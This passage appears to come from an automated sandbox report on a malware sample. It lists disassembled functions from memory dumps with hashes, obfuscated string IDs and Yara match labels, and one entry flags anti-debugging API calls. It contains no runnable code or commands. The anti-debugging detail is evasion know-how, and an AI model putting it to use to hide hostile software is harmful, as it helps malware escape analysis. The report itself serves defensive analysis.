                          • Opcode Fuzzy Hash: 17635d5d9c2ea99e6c8d47affebd6329b62548ec35397c7043d11d3fed521b3e
                          • Instruction Fuzzy Hash: D471647150C3419FD758CF25C49991FBBE2FBE4348F50892DF58A96260E7B1CA498F82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CA083, Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 8i$UZ$aK$wN
                          • API String ID: 0-333574292
                          • Opcode ID: a6a0b24c383be7939de8cb5fa0a7f320f0c154413070ca55bcd0e1767f045125
                          • Instruction ID: 7b3696815def1652c5abb1c2227876d9b715662e170ed2b75c990b4b8c68dc57
                          • Opcode Fuzzy Hash: a6a0b24c383be7939de8cb5fa0a7f320f0c154413070ca55bcd0e1767f045125
                          • Instruction Fuzzy Hash: 8C51A4711083459FC348CE65D48991FFBE2FFD8718F904A1EF5A692260D3B5CA0A8B83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DE3B5, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ev$uj$w0$!
                          • API String ID: 0-1708426219
                          • Opcode ID: e84d3c75bc747c83c0f271be7478e88a1bcb08a833e3525e25f16a4e1fb39d1e
                          • Instruction ID: 1e35c7dc5dd57f5e0af5bd37ea397732881e8760e0138f61613da1a665e43275
                          • Opcode Fuzzy Hash: e84d3c75bc747c83c0f271be7478e88a1bcb08a833e3525e25f16a4e1fb39d1e
                          • Instruction Fuzzy Hash: F15152B1D00219ABDF48DFE5D80A9EEFBB2FF58304F208059E811B6260D7B45A55CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DDB87, Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !_$N6\$R|h7$W+(
                          • API String ID: 0-592429890
                          • Opcode ID: 692d1958a7ae853d053f85e418a15216eafde29bc46aa7669b3c28cc6e05df2d
                          • Instruction ID: 05ed96f21f6a8fd26c83228fabaa2a0d5e2f68e9e126267d921af253bef07e00
                          • Opcode Fuzzy Hash: 692d1958a7ae853d053f85e418a15216eafde29bc46aa7669b3c28cc6e05df2d
                          • Instruction Fuzzy Hash: 58510D71D0121DEBCF08DFA1D98A8EEBFB2FB48304F20805AE411BA264D7B55A55CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C0326, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E4C041E
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6E4C0428
                          • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6E4C0435
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 97de4653f7d8a60bc5060eec26b36b3ee1abd4493334e1d569e836b7a1aeebda
                          • Instruction ID: facbe46bc7b3c3d4efef5a9e9224851562581860bc72c46eb7de8003627a4ed9
                          • Opcode Fuzzy Hash: 97de4653f7d8a60bc5060eec26b36b3ee1abd4493334e1d569e836b7a1aeebda
                          • Instruction Fuzzy Hash: B231D1B5901228ABCF61DF65D988BCDBBB8BF08710F5045EAE41CA7250E7309F858F55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A9F10, Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                          Download Yara Rule
                          Strings
                          • {recursion limit reached}{invalid syntax}, xrefs: 6E4AA182
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4A9F76
                          • <>()C,, xrefs: 6E4A9FAD
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: <>()C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${recursion limit reached}{invalid syntax}
                          • API String ID: 0-2241449410
                          • Opcode ID: ffdc0490c00591c350d7157bb3cca140dd4508ad32f3ea560271ccff3a462c90
                          • Instruction ID: 9f4634fe99d93a918703c463dd2cb0f17034d7c9e0e8651ec0532d2f6ab2e93f
                          • Opcode Fuzzy Hash: ffdc0490c00591c350d7157bb3cca140dd4508ad32f3ea560271ccff3a462c90
                          • Instruction Fuzzy Hash: 6081F4707087024FE324CEBCD490F9677E29FA1364F04892FD69A8B759D776E44A9B01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D85B8, Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: uQY$uQY$|&P-
                          • API String ID: 0-2022688025
                          • Opcode ID: a92861a14b704edfaa45df0e5950add45e350aefdd8f922c0db16aecb2e8225c
                          • Instruction ID: e6ed1eab85a06abe4b7619aa86a2b8a8cc7b1032d6c35b01492d750b19940892
                          • Opcode Fuzzy Hash: a92861a14b704edfaa45df0e5950add45e350aefdd8f922c0db16aecb2e8225c
                          • Instruction Fuzzy Hash: 95A13271908341AFC358CF25D48A81BFBF2FBC5758F108A1EF5959A260D7B1D94A8F82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D9124, Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: H9${FQ$~\
                          • API String ID: 0-4294077001
                          • Opcode ID: 6dc99ee14886c765de8187c205a84e16219ca8db519214540246810d04901235
                          • Instruction ID: 9b4995250107b6c20228fd28ee2afd3283c86df96bf568758fa6d427d4292326
                          • Opcode Fuzzy Hash: 6dc99ee14886c765de8187c205a84e16219ca8db519214540246810d04901235
                          • Instruction Fuzzy Hash: ECB1DD7240138C9BDF59DFA1D94A9CE3BB1FB44388F508119FD2A96260C7B5DA99CF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CCB13, Relevance: 3.9, Strings: 3, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: CP$F~c$|t3
                          • API String ID: 0-82454184
                          • Opcode ID: b04b25bbecc1f259a4fc2fde3581c27bdc2d4569c3b966c7e3772340f07d2b4f
                          • Instruction ID: 997da59a403476e2bbd5f6b4340bfec4bb5a17227902ba3056d0b454802ce7e3
                          • Opcode Fuzzy Hash: b04b25bbecc1f259a4fc2fde3581c27bdc2d4569c3b966c7e3772340f07d2b4f
                          • Instruction Fuzzy Hash: 3B815171D00209EBCF18CFE9D98A9EEFBB5FF54314F208129E516BA260D3744A459FA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D0BA4, Relevance: 3.9, Strings: 3, Instructions: 159COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (B$S&$~
                          • API String ID: 0-116492414
                          • Opcode ID: 26746bb7a51525a6e6b45d6698d9aacd379f953159f35882a3bd0a96d12f38f3
                          • Instruction ID: cda16b68f63d85f94a93a8a92b0d37bc40cb9e57cdecb52ca1e31c972439afd4
                          • Opcode Fuzzy Hash: 26746bb7a51525a6e6b45d6698d9aacd379f953159f35882a3bd0a96d12f38f3
                          • Instruction Fuzzy Hash: 26714271408741AFC359CFA1C98981BBBE1FB98758F104E0DF69696220D3B5CA098F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DBF0C, Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *1W$+[$m&E>
                          • API String ID: 0-1836634314
                          • Opcode ID: 0722b9282a0a22999d7566bfc3ebf6f8ac64210c6d37e40324af5b7df324970c
                          • Instruction ID: 48d72bc01afbfcd9dd91928b6090b6ca76eddaa7f8c40e13928ab9bce0ea116e
                          • Opcode Fuzzy Hash: 0722b9282a0a22999d7566bfc3ebf6f8ac64210c6d37e40324af5b7df324970c
                          • Instruction Fuzzy Hash: 31713F711083819BC748CF60D98A91BBBF1FBD4758F104E1EF58296260D7B9DA09CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C90D4, Relevance: 3.9, Strings: 3, Instructions: 128COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 13>$?_A$Jk|
                          • API String ID: 0-3522153091
                          • Opcode ID: 9f7db7fd69f16722ed54bbb1faa115af283d7ab3a07288f3dd77a07395533225
                          • Instruction ID: 34ace8de19439202ed8f0aad7801468acd59e31cb7b6c132c257fb9b4a5878ae
                          • Opcode Fuzzy Hash: 9f7db7fd69f16722ed54bbb1faa115af283d7ab3a07288f3dd77a07395533225
                          • Instruction Fuzzy Hash: 2C510571C0121AABDF08CFE5D94A9EEFBB1FF58314F208199D421BA260D3B85A05CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DE10A, Relevance: 3.9, Strings: 3, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: D^$vq$%
                          • API String ID: 0-2873858206
                          • Opcode ID: 54c4ce59a686b5dd3bf9a7e3ef94cf9caef809456948d77d4bf3fce0830084f2
                          • Instruction ID: 4f6c8cd24c61a8f24ce3b2a1effcd70a79ac29a45d520dce0cd6081aa1820460
                          • Opcode Fuzzy Hash: 54c4ce59a686b5dd3bf9a7e3ef94cf9caef809456948d77d4bf3fce0830084f2
                          • Instruction Fuzzy Hash: 6D4155715087028FC758EE25C98642FBBE5FBC5758F100A1EF586AA260D771CA488F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CF48A, Relevance: 3.9, Strings: 3, Instructions: 105COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )o$HzL$hsn
                          • API String ID: 0-543950899
                          • Opcode ID: 143d3884d5ae298a24ff13d8d7f865c4b77dc7df5fcf487677fbae11b3d6bed3
                          • Instruction ID: 4ac9b89f9323ab3bda4353b94703acfd40dd78764b058a840d8a25a617fb3ffd
                          • Opcode Fuzzy Hash: 143d3884d5ae298a24ff13d8d7f865c4b77dc7df5fcf487677fbae11b3d6bed3
                          • Instruction Fuzzy Hash: CD416C715083529BC718CE21D449A2FFBE2EBE4748F140A2DF59656260D3B5CA4E8F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DE899, Relevance: 3.8, Strings: 3, Instructions: 88COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )$H`f$^s\A
                          • API String ID: 0-2557149085
                          • Opcode ID: b10851f5ff62cb8970c47835fd07839b934c7fb626b2a7cf67d0b20d897d4c34
                          • Instruction ID: 0aed49a96133a5adc8092028b9b875e285c62732d5c7d39e3c48b463f44945e3
                          • Opcode Fuzzy Hash: b10851f5ff62cb8970c47835fd07839b934c7fb626b2a7cf67d0b20d897d4c34
                          • Instruction Fuzzy Hash: CE3155726093048FC758DF2AC88140BBBE1FBD8708F048A2DF98997354D770DA0A8F46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CCE5A, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0mZ$5-\$t2
                          • API String ID: 0-2873251415
                          • Opcode ID: 37070c9cf26442f8ea0e86b1f7c3f5d7b53a1400e48d463895da02277b411f90
                          • Instruction ID: b8aacbd4d79f1e024c3f0873e63efb9acd2432f6c8dcf49011127e279365c72d
                          • Opcode Fuzzy Hash: 37070c9cf26442f8ea0e86b1f7c3f5d7b53a1400e48d463895da02277b411f90
                          • Instruction Fuzzy Hash: 0E31127590134AEBCF44CFA5DA0A89FBBB5FF54314F108549E92562260D3B09B24DFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DDDA5, Relevance: 3.8, Strings: 3, Instructions: 58COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A>#$mK]$zh
                          • API String ID: 0-608348618
                          • Opcode ID: 103dee2b336bf25f8507ba83b0e833d55c82a63d957243bf54ec1509db9afec3
                          • Instruction ID: c05a99932705e2e8b5a8b7b50c1d523e37f02f9873ea0c421734b6c57d83fb38
                          • Opcode Fuzzy Hash: 103dee2b336bf25f8507ba83b0e833d55c82a63d957243bf54ec1509db9afec3
                          • Instruction Fuzzy Hash: C321F0B6E0020EABDB08DFA5C84A5AEBBB1FB50318F208599D514BA251D7B41B18DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B0380, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 732COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: <unknown>
                          • API String ID: 1617791916-1574992787
                          • Opcode ID: dc4b8f806974190b0457d6b1046c26327b6a2869ba31884fe79c6391cff7a18e
                          • Instruction ID: 3dcc39a44f0da651efb3e6a1136b465bc448588cc60a169d83bdbb67090c7688
                          • Opcode Fuzzy Hash: dc4b8f806974190b0457d6b1046c26327b6a2869ba31884fe79c6391cff7a18e
                          • Instruction Fuzzy Hash: F0629A70E04269CFDF15CFB8C990BDDBBB2AB49305F1481AAD459A7341E7709985CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A1DE0, Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: ?${invalid syntax}
                          • API String ID: 0-3691751180
                          • Opcode ID: f81459ce4e18fbdbcfd4846c94a05ed065aa84cf85fe1475a248f1e699f15450
                          • Instruction ID: c570a4ec7fa6a3b7ad9a7099f007491106def66753ca0b10534e4a6c92ce2699
                          • Opcode Fuzzy Hash: f81459ce4e18fbdbcfd4846c94a05ed065aa84cf85fe1475a248f1e699f15450
                          • Instruction Fuzzy Hash: B3B1797161C3528FC7048EBDC49095AB3A2AFA6360F04871FFBA85B309DB71E946D785
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C1EFB, Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: L&^$wg
                          • API String ID: 0-3816254650
                          • Opcode ID: 6e065bc8425b929036a8f37f36ced515496b018d1cd8b6822f77171bdd0a1856
                          • Instruction ID: a3d5a3bab34671b677624bd5d2b3db9cf6658a44af45debb514629938056f9fc
                          • Opcode Fuzzy Hash: 6e065bc8425b929036a8f37f36ced515496b018d1cd8b6822f77171bdd0a1856
                          • Instruction Fuzzy Hash: 2ED10E715083809FD368CF61C48AA4BFBE2FBD5758F108A1DF1AA96260D7B58949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A68B0, Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                          Download Yara Rule
                          Strings
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4A68C9
                          • {invalid syntax}, xrefs: 6E4A6B4D
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${invalid syntax}
                          • API String ID: 0-903684146
                          • Opcode ID: 6e2493b365878c3b4efe19d8f7a4b98d122e2c1491a225a7544e6a38e23a63b5
                          • Instruction ID: 4e92ffff7610fbc42cc1a5d3decf81a037e4c9740edb9b84c6620d6e293c0dcf
                          • Opcode Fuzzy Hash: 6e2493b365878c3b4efe19d8f7a4b98d122e2c1491a225a7544e6a38e23a63b5
                          • Instruction Fuzzy Hash: 298125B07243014FE7704EFD9490F66B7A6AB61374F1084BFCB9A4B78DE661E44A8342
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D3782, Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &b$*0
                          • API String ID: 0-1870266505
                          • Opcode ID: 50880284d0e9342d5679a526af0ddf43d637c4afaa052373fab50bf6f113c256
                          • Instruction ID: 3eaa353084d4c52dec43c7ba0545edb3a1cc85a0f6b8b6e3a09f2f510baab1ae
                          • Opcode Fuzzy Hash: 50880284d0e9342d5679a526af0ddf43d637c4afaa052373fab50bf6f113c256
                          • Instruction Fuzzy Hash: 38B133724083819FC7A8CF65C98950BFBE1BBC4758F60891EF1E596260D3B58A59CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001E1CDB, Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: J$d:
                          • API String ID: 0-1524728544
                          • Opcode ID: 9c0b095163af12cfbd5f3d1ae844cfe542a6333542cb3f835b4cb1a02d5cf671
                          • Instruction ID: 2635da00ae0c209cc085f40d393f8ffcab74416791aa957de6a6bde15f57e2da
                          • Opcode Fuzzy Hash: 9c0b095163af12cfbd5f3d1ae844cfe542a6333542cb3f835b4cb1a02d5cf671
                          • Instruction Fuzzy Hash: 39919771108780ABC728CF16C59956FBBE1FBC4708F54491EF986962A0CB709E49CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CAA4E, Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +a$>wd
                          • API String ID: 0-1130554497
                          • Opcode ID: aef3f13ceec116e9abd01f76485826d30dfa15812eb83165fb0a58559f4fc632
                          • Instruction ID: 5a8a6d75c12bbb205234ca564b060364234868e527b64f94c120d9419d4a8977
                          • Opcode Fuzzy Hash: aef3f13ceec116e9abd01f76485826d30dfa15812eb83165fb0a58559f4fc632
                          • Instruction Fuzzy Hash: 88613471508341AFC348DF25D58A90BBBE2BFC4758F44891DF58A9A260D770DA89CF86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DEA55, Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: P/=$nag
                          • API String ID: 0-756297285
                          • Opcode ID: f57a9baf65e21581a09217d46c0ed58c664342d6b716ffc6424086670a35f311
                          • Instruction ID: 9be4f5bb980c9287520178439a14980b5abcb5c39d4027e507b00005800497ad
                          • Opcode Fuzzy Hash: f57a9baf65e21581a09217d46c0ed58c664342d6b716ffc6424086670a35f311
                          • Instruction Fuzzy Hash: 0B610E72C01209ABCF49CFA1D94A9EEBFB1FF08314F208158E625B6260D3B55A55DFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D0E97, Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: F$$|:
                          • API String ID: 0-3326386790
                          • Opcode ID: f4654b4a5808b3f97f07377bc7a74794985a00cca75e47bca3a42ac1dfd7adb3
                          • Instruction ID: cb1fbe4f1f7170ad8933c42c6a5237d04ef74324ddfd51c258f2834222768d00
                          • Opcode Fuzzy Hash: f4654b4a5808b3f97f07377bc7a74794985a00cca75e47bca3a42ac1dfd7adb3
                          • Instruction Fuzzy Hash: 675142B2108341AFD754DF21C98981FBBE1FBD8708F408A1DF6A656221D3B5CA09CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DCD35, Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'jG$,W*
                          • API String ID: 0-3834443169
                          • Opcode ID: ac99fcea54602952a84880a1c330843c93e7ede20da088075ce582d62feeb8d7
                          • Instruction ID: dd327956b7f22bfb83c4db1bd29d6fd3e22759ae6e8bc3ad54a2d08d9f3c606a
                          • Opcode Fuzzy Hash: ac99fcea54602952a84880a1c330843c93e7ede20da088075ce582d62feeb8d7
                          • Instruction Fuzzy Hash: D34149726087118FC714CF29C48545BFBE0FF98718F418B6EE889A7251E774DA09CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C3228, Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: G?U$G?U
                          • API String ID: 0-4115723825
                          • Opcode ID: a8b7f482698a6a6f44470791029807ab3ad3ede4d21463687c8c33e5ecd255b1
                          • Instruction ID: be8dd75c99b5c19bb77472931bbe21333a23437d43b6b88293cbe305cae6fa8f
                          • Opcode Fuzzy Hash: a8b7f482698a6a6f44470791029807ab3ad3ede4d21463687c8c33e5ecd255b1
                          • Instruction Fuzzy Hash: DF31AD729083028BC348DF25D44990BBBE0BBE4798F15892DE899A7261D771CA09CF93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001E20CE, Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: a^$tA
                          • API String ID: 0-2190592617
                          • Opcode ID: b8d60be97ce7e69b445b885e3de6aa8b2ad1411acb22828de994b8afffe5d27b
                          • Instruction ID: e5e6e9076a946575887e366731146db2b60e0190abcd68f6d1813da29d0486d6
                          • Opcode Fuzzy Hash: b8d60be97ce7e69b445b885e3de6aa8b2ad1411acb22828de994b8afffe5d27b
                          • Instruction Fuzzy Hash: 6E410F71D0021AEBCF09DFE5C98A4EEBFB1FB54314F2081A9D512BA260D3B54A45CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CA92F, Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -K$o^
                          • API String ID: 0-865083084
                          • Opcode ID: ab50ad267e420ce37dc3a2bbf947fd39e307ef9114004a4de3985ce46ea8ccd8
                          • Instruction ID: 0394d4351b0e1d0dc1ca8cdbdccf332dd31fbaefb691c1e7a7dfc4cd5bc49d48
                          • Opcode Fuzzy Hash: ab50ad267e420ce37dc3a2bbf947fd39e307ef9114004a4de3985ce46ea8ccd8
                          • Instruction Fuzzy Hash: B5314771D0161AEBCB18CFE9C98A4EEBBB5EB50314F24818AD512BB250D7709B46CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CAE43, Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: TS_$`:
                          • API String ID: 0-942315
                          • Opcode ID: 0d47acef4d6cb357534fb5289c4d909aa5272ea62963ea351491769245b965dc
                          • Instruction ID: 409049ac81c1133535c6cb09878bfbebb569363068e6502f8f6ee3aeb839e17d
                          • Opcode Fuzzy Hash: 0d47acef4d6cb357534fb5289c4d909aa5272ea62963ea351491769245b965dc
                          • Instruction Fuzzy Hash: 9831BDB2C12209EBCF45DFA1CA0A5DEBBB0FB54348F208199D42576261D3B44B48DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BE3A1, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                          Download Yara Rule
                          APIs
